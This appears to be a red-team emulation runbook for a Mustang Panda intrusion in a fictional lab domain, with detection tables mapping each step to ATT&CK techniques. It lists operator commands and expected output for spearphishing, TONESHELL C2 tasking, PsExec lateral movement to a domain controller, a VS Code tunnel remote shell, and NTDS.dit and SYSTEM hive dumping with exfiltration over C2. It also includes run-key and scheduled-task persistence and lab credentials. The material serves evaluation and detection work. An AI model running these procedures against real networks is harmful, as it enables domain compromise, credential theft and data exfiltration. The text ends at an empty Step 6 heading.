Mustang Panda Scenario

Step 0 - Setup

Procedures

☣️ From your localhost, initiate an RDP session to the Kali attack host driftmark (174.3.0.70) if not already established

Destination Username Password

174.3.0.70 op1 Barbed-Directive

Destination	Username	Password
174.3.0.70	op1	Barbed-Directive

☣️ In a new terminal window, start the simple file server, plugx, vscode_tunnel, and toneshell handlers:

Password
Barbed-Directive

cd /opt/kalidev/mustang_panda/Resources/controlServer
sudo ./controlServer -c config/mustang_panda.yml

Expected Output

...
[SUCCESS] 2024/04/01 10:10:11 Started handler simplefileserver
[SUCCESS] 2024/04/01 10:10:11 Started handler vscode_tunnel
[SUCCESS] 2024/04/01 10:10:11 Started handler toneshell
[SUCCESS] 2024/04/01 10:10:11 Started handler plugx
[INFO] 2024/04/01 10:10:11 Waiting for connections

☣️ In a new terminal window, activate the Python virtual environment. This should prepend your terminal prompt with (venv). Use this terminal for any Python commands run on Kali
```
cd /opt/kalidev
source venv/bin/activate
```

Step 1 - Initial Access

Voice Track

Mustang Panda sends an email from fantaryon@lorath.com to htargaryen@kingslanding.net containing a .docx file attachment. htargaryen opens the .docx file and clicks the link embedded in the document. htargaryen downloads the password-protected RAR file hosted on the adversary server. htargaryen extracts the contents of the RAR file and executes the LNK file. The LNK file executes EssosUpdate.exe (renamed legitimate binary wsddebug_host.exe) which side-loads wsdapi.dll, TONESHELL.

wsdapi.dll is the TONESHELL loader and is signed by a self-signed certificate. The loader performs several anti-analysis techniques before registering and re-executing itself a second time via regsvr32.exe. After spawning a child waitfor.exe process, the loader executes itself a third time by using mavinject to inject itself into the spawned waitfor.exe process.

Once executed in the intended waitfor.exe child process, TONESHELL XOR decrypts and loads the embedded shellcode payload into memory. The shellcode discovers the computer name and generates a GUID for the victim then connects to attacker C2 191.44.44.199 over port 443.

Procedures

From the jumpbox, initiate an RDP session to the workstation harrenhal (10.55.4.103) (if not already connected)

Destination Username Password

harrenhal.kingslanding.net kingslanding\htargaryen Pidgeon-Book
On the workstation harrenhal (10.55.4.103), open Command Prompt and mount the E: drive of conclave (10.55.3.105)
```
net use \\10.55.3.105\E$
```
On the workstation harrenhal (10.55.4.103), open FireFox and browse to the Outlook Web Access portal, logging in with htargaryen's credentials

Destination Username Password

https://sept.kingslanding.net/owa kingslanding\htargaryen Pidgeon-Book

Destination	Username	Password
harrenhal.kingslanding.net	kingslanding\htargaryen	Pidgeon-Book

Destination	Username	Password
https://sept.kingslanding.net/owa	kingslanding\htargaryen	Pidgeon-Book

☣️ Switch to the Kali machine, open up a shell prompt, and send the spearphishing email

python3 /opt/kalidev/mustang_panda/Resources/email_generation/send_email.py mail.lorath.com /opt/kalidev/mustang_panda/Resources/payloads/toneshell_spearphishing.html -t 'cstark@tully.org,nstark@winterfell.net,jsnow@wall.net,dtargaryen@dragonstone.com,cvelaryon@driftmark.net,lvelaryon@driftmark.net' -cc 'htargaryen@kingslanding.net,missandei@mereen.com,xdaxos@quarth.net,imopatis@pentos.net' -f fantaryon@lorath.com -fn 'Ferrego Antaryon' -s 'Westeros & Essos Cyber Summit 2025 Attendance Confirmed' -a /opt/kalidev/mustang_panda/Resources/payloads/toneshell_spearphishing.docx -an 'Strategic Competition with Pentos - Assessing Braavos Competitiveness Beyond Essos.docx'

Expected Output
```
Successfully sent email
```

Switch to the RDP to the workstation harrenhal (10.55.4.103) and confirm receipt of the spearphishing email
Open the email and download the attachment. Open the Downloads folder then double-click to open the attachment. Then, CTRL+click on the embedded link inside the document to initiate the download of the password-protected RAR file 250325_Pentos_Board_Minutes.rar
Open the Downloads folder, right-click the RAR file then click "Show More Options" > "WinRAR" > "Extract Here", entering the RAR password when prompted:

Password

Pentos
Double click to execute the .LNK file then switch windows several times to bypass the sandbox check
☣️ Switch to Kali and confirm C2 registration

Password
Pentos

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Initial Access	T1566.001	Phishing: Spearphishing Attachment	Windows	`htargaryen` received an email from fantaryon@lorath[.]com with an `Strategic Competition with Pentos - Assessing Braavos Competitiveness Beyond Essos.docx`	Not Calibrated - Not Benign	Mustang Panda sends a spearphishing attachment to `htargaryen`	harrenhal (10.55.4.103)	htargaryen	send_email.py	21, 22, 6, 19
Execution	T1204.001	User Execution: Malicious Link	Windows	`htargaryen` downloads/opened the .docx file and clicked on a link to http[:]//pentos-analysis[.]org	Not Calibrated - Not Benign	`htargaryen` clicks on link inside malicious attachment	harrenhal (10.55.4.103)	htargaryen	-	21, 22, 6, 19
Defense Evasion	T1027.013	Obfuscated Files or Information: Encrypted/Encoded File	Windows	msedge.exe downloaded and extracts the contents of the password-protected RAR file 250325_Pentos_Board_Minutes.rar	Calibrated - Not Benign	`htargaryen` downloads and extracts the contents of the password-protected RAR file 250325_Pentos_Board_Minutes.rar	harrenhal (10.55.4.103)	htargaryen	-	21, 22, 6, 19
Execution	T1204.002	User Execution: Malicious File	Windows	`htargaryen` executes the LNK file `Essos Competitiveness Brief.lnk`	Not Calibrated - Not Benign	`htargaryen` executes the LNK file `Essos Competitiveness Brief.lnk`	harrenhal (10.55.4.103)	htargaryen	-	21, 22, 6, 19
Execution	T1204.002	User Execution: Malicious File	Windows	explorer.exe executed `EssosUpdate.exe` (renamed legitimate binary `wsddebug_host.exe`)	Not Calibrated - Not Benign	LNK file `Essos Competitiveness Brief.lnk` executes `EssosUpdate.exe` (renamed legitimate binary `wsddebug_host.exe`)	harrenhal (10.55.4.103)	htargaryen	-	21, 22, 6, 19
Defense Evasion	T1574.002	Hijack Execution Flow: DLL Side-Loading	Windows	`EssosUpdate.exe` side-loads `wsdapi.dll`	Calibrated - Not Benign	`EssosUpdate.exe` (renamed legitimate binary `wsddebug_host.exe`) side-loads the TONESHELL loader DLL `wsdapi.dll`	harrenhal (10.55.4.103)	htargaryen	DLL exports, Exported function definitions	21, 22, 6, 19
Defense Evasion	T1553.002	Subvert Trust Controls: Code Signing	Windows	`wsdapi.dll` is signed with a self-signed cert	Calibrated - Not Benign	TONESHELL loader DLL `wsdapi.dll` is signed with a self-signed certificate	harrenhal (10.55.4.103)	htargaryen	DLL signed at build, Signing script	21, 22, 6, 19
Defense Evasion	T1497	Virtualization/Sandbox Evasion	Windows	`wsdapi.dll` checks if the current process name matches `EssosUpdate.exe` using GetModuleFileNameW	Not Calibrated - Not Benign	TONESHELL loader checks if the current process name matches `EssosUpdate.exe` using GetModuleFileNameW	harrenhal (10.55.4.103)	htargaryen	VerifyProcessName	22
Defense Evasion	T1622	Debugger Evasion	Windows	`wsdapi.dll` uses custom execeptions to hinder debuggers	Not Calibrated - Not Benign	TONESHELL loader uses custom exceptions to hinder debuggers	harrenhal (10.55.4.103)	htargaryen	Throw custom exception	22
Defense Evasion	T1497	Virtualization/Sandbox Evasion	Windows	`wsdapi.dll` checks for changes to the foreground window	Not Calibrated - Not Benign	TONESHELL loader checks for changes to the foreground window	harrenhal (10.55.4.103)	htargaryen	ForegroundWindowCheck	22
Defense Evasion	T1218.010	System Binary Proxy Execution: Regsvr32	Windows	`EssosUpdate.exe` executed regsvr32.exe to register and load `wsdapi.dll`	Not Calibrated - Not Benign	TONESHELL loader registers and re-executes itself using `regsvr32.exe /s`	harrenhal (10.55.4.103)	htargaryen	RegisterSelf	18
Defense Evasion	T1218.013	System Binary Proxy Execution: Mavinject	Windows	`regsvr32.exe` spawns `waitfor.exe` then executes `mavinject` to inject the `wsdapi.dll` into `waitfor.exe`	Not Calibrated - Not Benign	`regsvr32.exe` spawns `waitfor.exe` then executes `mavinject` to inject the TONESHELL loader DLL `wsdapi.dll` into `waitfor.exe`	harrenhal (10.55.4.103)	htargaryen	DllRegisterServer	18
Defense Evasion	T1027.009	Obfuscated Files or Information: Embedded Payloads	Windows	`wsdapi.dll` contains embedded shellcode in the data section	Not Calibrated - Not Benign	TONESHELL loader DLL `wsdapi.dll` contains embedded shellcode in the data section	harrenhal (10.55.4.103)	htargaryen	Embedded Payload Header Template, Embed shellcode at build time, Payload Embed Script	18, 22
Defense Evasion	T1140	Deobfuscate/Decode Files or Information	Windows	`wsdapi.dll` XOR decrypts embedded shellcode	Calibrated - Not Benign	TONESHELL loader XOR decrypts embedded shellcode	harrenhal (10.55.4.103)	htargaryen	Xor Functions, Decrypt shellcode	18, 22
Defense Evasion	T1620	Reflective Code Loading	Windows	`wsdapi.dll` reflectively loads and executes the shellcode	Calibrated - Not Benign	TONESHELL loader reflectively loads and executes the shellcode	harrenhal (10.55.4.103)	htargaryen	Execute shellcode	18, 22
Discovery	T1082	System Information Discovery	Windows	waitfor.exe discovers computer name via GetComputerNameA	Not Calibrated - Not Benign	TONESHELL discovers computer name via GetComputerNameA	harrenhal (10.55.4.103)	htargaryen	GetHostname	18, 22
Defense Evasion	T1106	Native API	Windows	waitfor.exe creates a random GUID using CoCreateGuid	Not Calibrated - Not Benign	TONESHELL creates a random GUID using CoCreateGuid	harrenhal (10.55.4.103)	htargaryen	GenerateNewVictimID	18, 22
Command and Control	T1095	Non-Application Layer Protocol	Windows	waitfor.exe connects to `191.44.44.199`over TCP port 443	Not Calibrated - Not Benign	TONESHELL connects to `191.44.44.199`over TCP port 443	harrenhal (10.55.4.103)	htargaryen	PerformHandshake, connectSocket, Set server and port at build time	18, 20, 22, 11
Execution	T1106	Native API	Windows	waitfor.exe uses ws2_32 `send` API to connect to C2	Not Calibrated - Not Benign	TONESHELL uses ws2_32 `send` API to connect to C2	harrenhal (10.55.4.103)	htargaryen	sendClientMsg	18, 20

Step 2 - Discovery

Voice Track

Mustang Panda then uses TONESHELL to perform network discovery on the workstation harrenhal (10.55.4.103). Mustang Panda uses netstat and SharpNBTScan to discover the file server conclave (10.55.3.105) and domain controller redkeep (10.55.3.100).

Procedures

☣️ Task TONESHELL to execute netstat to discover a network connection to conclave (10.55.3.105)

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 5, "taskNum": 1, "args": "netstat -anop tcp"}'

Expected Output

Active Connections

  Proto   Local Address     Foreign Address   State...

☣️ Task TONESHELL to execute ipconfig to discover the subnet mask of the network

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 5, "taskNum": 2, "args": "ipconfig /all"}'

Expected Output

Windows IP Configuration

   Host Name . . . . . . . . . . . . : harrenhal
   Primary Dns Suffix  . . . . . . . : kingslanding.net
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : us-east-1.ec2-utilities.amazonaws.com
                                       kingslanding.net

Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Amazon Elastic Network Adapter
   Physical Address. . . . . . . . . : 0A-FF-E3-74-79-9D
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::2cad:8638:2bd1:fe7b%5(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.55.4.103(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.128
   Lease Obtained. . . . . . . . . . : Friday, June 6, 2025 11:01:08 AM
   Lease Expires . . . . . . . . . . : Friday, June 6, 2025 8:01:09 PM
   Default Gateway . . . . . . . . . : 10.55.4.1
   DHCP Server . . . . . . . . . . . : 10.55.4.1
   DHCPv6 IAID . . . . . . . . . . . : 118924644
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2C-ED-A4-EE-08-00-27-A3-42-54
   DNS Servers . . . . . . . . . . . : 10.55.3.100
   NetBIOS over Tcpip. . . . . . . . : Enabled

☣️ Task TONESHELL to download SharpNBTScan

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 3, "taskNum": 3, "payload": "SharpNBTScan.exe", "args": "mswin1.exe"}'

Expected Output

  [DEBUG] 2025/07/29 13:17:08 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
   [INFO] 2025/07/29 13:17:17 Received SetTaskBySessionId request
[SUCCESS] 2025/07/29 13:17:17 Successfully set task for session: b7107b26bdc8e2eea0dc91c8e603370f
  [DEBUG] 2025/07/29 13:17:18 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 13:17:18 [TONESHELL] Received file chunk request from session ID b7107b26bdc8e2eea0dc91c8e603370f
   [INFO] 2025/07/29 13:17:18 [TONESHELL] Sent file chunk to session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 3: 13824 bytes
  [DEBUG] 2025/07/29 13:17:18 [TONESHELL] Closed handle for file /opt/kalidev/mustang_panda/Resources/payloads/SharpNBTScan.exe
   [INFO] 2025/07/29 13:17:18 [TONESHELL] Received task complete response from session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 3; task type: 3, exit code: 0. Registering task output.
[SUCCESS] 2025/07/29 13:17:18 [TONESHELL] Successfully downloaded file /opt/kalidev/mustang_panda/Resources/payloads/SharpNBTScan.exe
  [DEBUG] 2025/07/29 13:17:28 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 13:17:38 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)

☣️ Task TONESHELL to execute SharpNBTScan to discover other workstations in the domain

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 5, "taskNum": 4, "args": "mswin1.exe 10.55.4.0/24"}'

Expected Output

[*]Start udp client...
[+] ip range 10.55.4.1 - 10.55.4.254
[*]Udp client will stop in 10s ...
10.55.4.104    KINGSLANDING\STEPSTONES
10.55.4.101    KINGSLANDING\FLEABOTTOM
10.55.4.102    KINGSLANDING\FISHMONGER
[*]Stop udp client ...

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Discovery	T1049	System Network Connections Discovery	Windows	waitfor.exe executes `netstat -anop tcp`	Not Calibrated - Not Benign	TONESHELL executes `netstat -anop tcp`	harrenhal (10.55.4.103)	htargaryen	PerformExecTask	16, 17, 23
Discovery	T1016	System Network Configuration Discovery	Windows	waitfor.exe executes `ipconfig /all`	Not Calibrated - Not Benign	TONESHELL executes `ipconfig /all`	harrenhal (10.55.4.103)	htargaryen	PerformExecTask	17
Command and Control	T1105	Ingress Tool Transfer	Windows	waitfor.exe downloaded SharpNBTScan as `mswin1.exe`	Not Calibrated - Not Benign	TONESHELL downloads SharpNBTScan as `mswin1.exe`	harrenhal (10.55.4.103)	htargaryen	PerformFileDownloadTask	16, 26
Discovery	T1018	Remote System Discovery	Windows	waitfor.exe executed SharpNBTScan `mswin1.exe` against `10.55.4.0/24`	Not Calibrated - Not Benign	TONESHELL executes SharpNBTScan `mswin1.exe` against `10.55.4.0/24`	fleabottom (10.55.4.101), fishmonger (10.55.4.102), harrenhal (10.55.4.103), stepstones (10.55.4.104)	htargaryen	PerformExecTask	16, 26

Step 3 - Lateral Movement

Voice Track

After discovering the domain controller redkeep (10.55.3.100), Mustang Panda uses TONESHELL to perform lateral movement via PsExec to pivot to the domain controller in preparation for credential dumping. TONESHELL uses PsExec to execute the VS Code tunnel batch script on the domain controller to establish a remote shell.

Procedures

☣️ Task TONESHELL to download the VS Code tunnel batch script to C:\\users\\htargaryen\\AppData\\Local\\CodeHelper.bat

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 3,  "taskNum": 5, "payload": "startcode.bat", "args": "C:\\users\\htargaryen\\AppData\\Local\\CodeHelper.bat"}'

Expected Output

  [DEBUG] 2025/07/29 13:24:39 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 13:24:49 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
   [INFO] 2025/07/29 13:24:54 Received SetTaskBySessionId request
[SUCCESS] 2025/07/29 13:24:54 Successfully set task for session: b7107b26bdc8e2eea0dc91c8e603370f
  [DEBUG] 2025/07/29 13:24:59 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 13:24:59 [TONESHELL] Received file chunk request from session ID b7107b26bdc8e2eea0dc91c8e603370f
   [INFO] 2025/07/29 13:24:59 [TONESHELL] Sent file chunk to session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 5: 797 bytes
  [DEBUG] 2025/07/29 13:24:59 [TONESHELL] Closed handle for file /opt/kalidev/mustang_panda/Resources/payloads/startcode.bat
   [INFO] 2025/07/29 13:24:59 [TONESHELL] Received task complete response from session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 5; task type: 3, exit code: 0. Registering task output.
[SUCCESS] 2025/07/29 13:24:59 [TONESHELL] Successfully downloaded file /opt/kalidev/mustang_panda/Resources/payloads/startcode.bat
  [DEBUG] 2025/07/29 13:25:09 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 13:25:19 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)

☣️ Task TONESHELL with executing the VS Code tunnel batch script via PsExec on the domain controller redkeep (10.55.3.100). Switch to the control server output and confirm receipt of an authentication code from the VSCODE_TUNNEL handler

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 5, "taskNum": 6, "args": "psexec \\\\10.55.3.100 -accepteula -d -c C:\\users\\htargaryen\\AppData\\Local\\CodeHelper.bat"}'

Expected Output

[SUCCESS] 2025/04/15 15:28:42 [VSCODE_TUNNEL] USE AUTHENTICATION CODE: XXXX-XXXX

☣️ Open a new tab in Chrome on Kali and browse to the GitHub authentication portal and sign into the adversary GitHub account.

Destination

https://github.com/login/device
☣️ Enter the retrieved GitHub login device code then "Authorize Visual-Studio-Code" if prompted.
☣️ In a new browser tab, browse to access the VS Code tunnel. When prompted with "What type of account did you use to start this tunnel?" select GitHub > Allow > Continue > Authorize Visual-Studio-Code if prompted. Wait until the VS Code tunnel as connected successfully and the tunnel in the bottom left reads redkeep

Destination

https://vscode.dev/tunnel/redkeep

Destination
https://github.com/login/device

Destination
https://vscode.dev/tunnel/redkeep

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Command and Control	T1105	Ingress Tool Transfer	Windows	waitfor.exe downloaded VS Code tunnel batch script `CodeHelper.bat`	Not Calibrated - Not Benign	TONESHELL downloads VS Code tunnel batch script `CodeHelper.bat`	harrenhal (10.55.4.103)	htargaryen	PerformFileDownloadTask	5, 25
Lateral Movement	T1021.002	Remote Services: SMB/Windows Admin Shares	Windows	waitfor.exe executed PsExec and connected to ADMIN$ share on the domain controller `redkeep (10.55.3.100)`	Not Calibrated - Not Benign	TONESHELL executes PsExec and connects to ADMIN$ share on the domain controller `redkeep (10.55.3.100)`	harrenhal (10.55.4.103), redkeep (10.55.3.100)	htargaryen	PerformExecTask	26
Execution	T1543.003	Create or Modify System Process: Windows Service	Windows	PsExec created PSEXESVC on the domain controller `redkeep (10.55.3.100)`	Not Calibrated - Not Benign	PsExec creates PSEXESVC on the domain controller `redkeep (10.55.3.100)`	redkeep (10.55.3.100)	htargaryen	-	26
Lateral Movement	T1570	Lateral Tool Transfer	Windows	PsExec copies `CodeHelper.bat` to the domain controller `redkeep (10.55.3.100)`	Not Calibrated - Not Benign	PsExec copies `CodeHelper.bat` to the domain controller `redkeep (10.55.3.100)`	redkeep (10.55.3.100)	htargaryen	-	26
Execution	T1569.002	System Services: Service Execution	Windows	PsExec executes `CodeHelper.bat` on the domain controller `redkeep (10.55.3.100)`	Not Calibrated - Not Benign	PsExec executes `CodeHelper.bat` on the domain controller `redkeep (10.55.3.100)`	redkeep (10.55.3.100)	htargaryen	startcode.bat	26
Command and Control	T1572	Protocol Tunneling	Windows	`CodeHelper.bat` executed cmd.exe to establish a tunnel (`code-tunnel.exe`)	Calibrated - Not Benign	Mustang Panda uses VS Code to establish a tunnel	redkeep (10.55.3.100)	htargaryen	startcode.bat	26
Lateral Movement	T1021.004	Remote Services: SSH	Windows	htargaryen authenticated to github through `code-tunnel.exe`	Calibrated - Not Benign	Mustang Panda authenticates with GitHub to connect to the tunnel	redkeep (10.55.3.100)	htargaryen	-	26

Step 4 - Credential Access

Voice Track

Using the VS Code tunnel on the domain controller redkeep (10.55.3.100), Mustang Panda uses vssadmin and reg save to perform credential dumping via NTDS. Mustang Panda uses the VS Code tunnel on the domain controller to stage the necessary NTDS.dit and SYSTEM hive files back on the initially compromised workstation harrenhal (10.55.4.103). Then, Mustang Panda uses OPRHEUS to exfiltrate the NTDS files over its existing C2 for offline cracking.

Procedures

☣️ Using the VS Code tunnel on the domain controller redkeep (10.55.3.100), click the Search bar > Show and Run Commands > type and select "Create New Terminal (With Profile)" > select "PowerShell" to open a PowerShell terminal.Then execute the following command to create a volume shadow copy of the domain controller's C:\ drive. If vscode.dev asks for clipboard permissions, click Allow. Take note of the number following HarddiskVolumeShadowCopy for use in a future command
```
vssadmin create shadow /for=c: /autoretry=10
```
- Expected Output
```
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'c:\'
    Shadow Copy ID: {b4d78609-974e-4f64-a39c-d9d8c2196b47}
    Shadow Copy Volume Name: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5
```
☣️ Using the VS Code tunnel on the domain controller redkeep (10.55.3.100), execute net use to mount the C: drive of the initial workstation harrenhal (10.55.4.103). When prompted for a username and password use the credentials below. NOTE: password has been whitecarded for this scenario

Username Password

kingslanding\htargaryen Pidgeon-Book
```
net use \\10.55.4.103\C$
```
- Expected Output
```
The command completed successfully
```
☣️ Using the VS Code tunnel on the domain controller redkeep (10.55.3.100), copy the NTDS.dit file from the shadow copy back to the initial workstation harrenhal (10.55.4.103). Update the command below to copy the ID of the volume shadow copy created in the earlier step
```
cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<REPLACE_ID>\Windows\NTDS\NTDS.dit \\10.55.4.103\C$\windows\temp\ntds.dit"
```
- Expected Output
```
1 file(s) copied
```
☣️ Using the VS Code tunnel on the domain controller redkeep (10.55.3.100), save the System hive to the workstation harrenhal (10.55.4.103)
```
reg save hklm\system \\10.55.4.103\C$\windows\temp\system.hive
```
- Expected Output
```
The operation completed successfully.
```
☣️ Using the VS Code tunnel on the domain controller redkeep (10.55.3.100), delete the mounted C: drive
```
net use /delete \\10.55.4.103\C$
```
- Expected Output
```
\\10.55.4.103\C$ was deleted successfully.
```

Username	Password
kingslanding\htargaryen	Pidgeon-Book

☣️ Return to the Kali terminal and task TONESHELL with exfiltrating the SYSTEM hive

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 7,  "taskNum": 7, "args": "C:\\windows\\temp\\system.hive"}'

Expected Output

Successfully saved uploaded file as system.hive

☣️ From the Kali terminal, task TONESHELL with exfiltrating the NTDS.dit file

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 7, "taskNum": 8, "args": "C:\\windows\\temp\\ntds.dit"}'

Expected Output

Successfully saved uploaded file as ntds.dit

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Execution	T1059.001	Command and Scripting Interpreter: PowerShell	Windows	`code-tunnel.exe` executed PowerShell commands	Not Calibrated - Not Benign	Mustang Panda uses VS Code tunnel to execute PowerShell commands	harrenhal (10.55.4.103)	htargaryen	-	26
Execution	T1059.003	Command and Scripting Interpreter: Windows Command Shell	Windows	`code-tunnel.exe` executed CMD commands	Not Calibrated - Not Benign	Mustang Panda uses VS Code tunnel to execute CMD commands	harrenhal (10.55.4.103)	htargaryen	-	26
Defense Evasion	T1006	Direct Volume Access	Windows	`code-tunnel.exe` executed `vssadmin` to create a shadow copy of the `C:\`	Not Calibrated - Not Benign	Mustang Panda uses VS Code tunnel to execute `vssadmin` to create a shadow copy of the `C:\`	redkeep (10.55.3.100)	htargaryen	-	25, 26
Collection	T1074	Data Staged	Windows	`code-tunnel.exe` executed remote UNC path (over SMB) to stage the NTDS.dit	Not Calibrated - Not Benign	Mustang Panda uses VS Code tunnel to stage the NTDS.dit on the workstation `harrenhal (10.55.4.103)`	redkeep (10.55.3.100), harrenhal (10.55.4.103)	htargaryen	-	25, 26
Credential Access	T1003.003	OS Credential Dumping: NTDS	Windows	`code-tunnel.exe` executed reg.exe to save the SYSTEM registry file to C:\Windows\Temp\	Calibrated - Not Benign	Mustang Panda uses VS Code tunnel to export the SYSTEM file registry	redkeep (10.55.3.100), harrenhal (10.55.4.103)	htargaryen	-	25, 26
Exfiltration	T1041	Exfiltration Over C2 Channel	Windows	waitfor.exe exfiltrated the SYSTEM hive to 191.44.44.199	Not Calibrated - Not Benign	TONESHELL exfiltrates the SYSTEM hive	harrenhal (10.55.4.103)	htargaryen	PerformFileUploadTask	26
Exfiltration	T1041	Exfiltration Over C2 Channel	Windows	waitfor.exe exfiltreated the NTDS.dit to 191.44.44.199	Not Calibrated - Not Benign	TONESHELL exfiltrates the NTDS.dit	harrenhal (10.55.4.103)	htargaryen	PerformFileUploadTask	25

Step 5 - Persistence

Voice Track

Mustang Panda then disconnects from the domain controller and installs persistence on harrenhal (10.55.4.103) via registry run key AccessoryInputServices to re-execute TONESHELL on user login. Mustang Panda then installs additional persistence by creating a scheduled task to execute the VS Code tunnel batch script. Mustang Panda then executes the persistence mechanism to establish the VS Code tunnel.

Procedures

☣️ Return to the browser tab with the VS Code tunnel to the domain controller redkeep (10.55.3.100). Click the tunnel name (redkeep) in the bottom left and select "close remote workspace"

☣️ Task TONESHELL to create the registry run key

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 5,  "taskNum": 9, "args": "reg.exe add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v AccessoryInputServices /t REG_SZ /d \"C:\\Users\\htargaryen\\Downloads\\250325_Pentos_Board_Minutes\\EssosUpdate.exe\" /f"}'

Expected Output
```
The operation completed successfully.
```

☣️ Task TONESHELL to create a scheduled task to execute the VS Code tunnel batch script every minute

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 5, "taskNum": 10, "args": "schtasks.exe /F /Create /TN AccessoryInputServices /sc minute /MO 1 /TR C:\\Users\\htargaryen\\AppData\\Local\\CodeHelper.bat"}'

Expected Output

SUCCESS: The scheduled task "AccessoryInputServices" has successfully been created.

☣️ Once the scheduled task has executed, check the control server terminal and confirm receipt of the authentication code from the VSCODE_TUNNEL handler
- Expected Output
```
[SUCCESS] 2025/04/15 15:28:42 [VSCODE_TUNNEL] USE AUTHENTICATION CODE: XXXX-XXXX
```
☣️ In a new browser tab on Kali, browse to the GitHub authentication portal and Continue as the signed in adversary GitHub account

Destination

https://github.com/login/device/
☣️ Enter the retrieved GitHub login device code and continue. Click "Authorize Visual-Studio-Code" if prompted.
☣️ In a new browser tab, browse to access the VS Code tunnel then select GitHub

Destination
https://github.com/login/device/

Allow > Continue > Authorize Visual-Studio-Code if prompted. Wait until the VS Code tunnel as connected successfully and the tunnel in the bottom left reads harrenhal

Destination
https://vscode.dev/tunnel/harrenhal

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder	Windows	waitfor.exe executed reg.exe to add the `AccessoryInputServices` registry run key	Calibrated - Not Benign	TONESHELL adds the registry run key `AccessoryInputServices`	harrenhal (10.55.4.103)	htargaryen	PerformExecTask	25
Persistence	T1053.005	Scheduled Task/Job: Scheduled Task	Windows	waitfor.exe created a new scheduled task named `AccessoryInputServices` to execute the `codehelper.bat` file every minute	Calibrated - Not Benign	TONESHELL creates scheduled task `AccessoryInputServices`	harrenhal (10.55.4.103)	htargaryen	PerformExecTask	5, 25
Command and Control	T1572	Protocol Tunneling	Windows	svchost.exe executed codehelper.bat that established the code-tunnel.exe	Calibrated - Not Benign	TONESHELL uses VS Code to establish a tunnel	harrenhal (10.55.4.103)	htargaryen	startcode.bat	26
Lateral Movement	T1021.004	Remote Services: SSH	Windows	htargaryen authenticated to github through code-tunnel.exe	Calibrated - Not Benign	TONESHELL authenticates with GitHub to connect to the tunnel	harrenhal (10.55.4.103)	htargaryen	-	26

Step 6 - Collection and Exfiltration

Voice Track

